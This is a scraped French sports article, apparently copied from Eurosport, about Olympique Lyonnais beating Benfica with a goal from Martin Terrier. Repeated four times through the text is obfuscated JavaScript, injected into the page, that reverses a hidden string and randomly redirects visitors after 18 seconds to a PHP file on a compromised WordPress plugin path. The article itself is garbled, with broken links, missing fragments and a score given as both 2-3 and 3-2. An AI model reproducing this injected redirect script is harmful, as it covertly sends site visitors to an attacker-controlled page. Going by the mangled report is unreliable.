L’OL bat Benfica grâce à un nouveau but de Martin Terrier (2-3)

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraphs”>

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/equipes/lyon/teamcenter.shtml”>Olympique Lyonnaiss’est imposé face au Benfica grâce à un nouveau but de Martin Terrier (3-2), pour son entrée en lice en International Champions Cup. L’attaquant venu de tous les doutes, mais décrochent leur troisième victoire en cette avant-saison.

Un OL à deux vitesses

tout n’a pas été simple mercredi pour cet OL à deux vitesses. Plutôt dominés par les Portugais en début de match, les Lyonnais ont concédé plusieurs occasions. Ruben Dias, cible lyonnaise sur le mercato, a manqué le cadre de la tête (19e), avant que touche le poteau (26e). L’équipe de Genesio a peu à peu repris le contrôle d’une rencontre hachée, en témoigne l’altercation de $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/marcelo_prs207281/person.shtml”>Marcelo sur corner (41e), puis par and_prs138051/person.shtml”>Bertrand Traoré, d’un plat du pied à la conclusion d’un contre (45e).

tombés dans leur travers après la pause. À force de reculer, les visiteurs ont concédé de plus en plus d’occasions. $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/pizzi_prs230137/person.shtml”>Pizzi d’un joli piqué (59e). Cinq minutes plus tard, Marcelo, d’un tacle, envoyait le ballon dans son propre but (64e). L’OL a bien failli laisser filer le match dans les minutes qui ont suivi. Mais il s’est décidément trouvé son homme providentiel en préparation. Espèrons pour eux que le scénario se reproduise, dès samedi face à l’Inter.

 

Source: tory.shtml” target=”_blank” rel=”noopener”>Eurosport

  • 3
  •  
  •  
  •  
  •  
    3
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :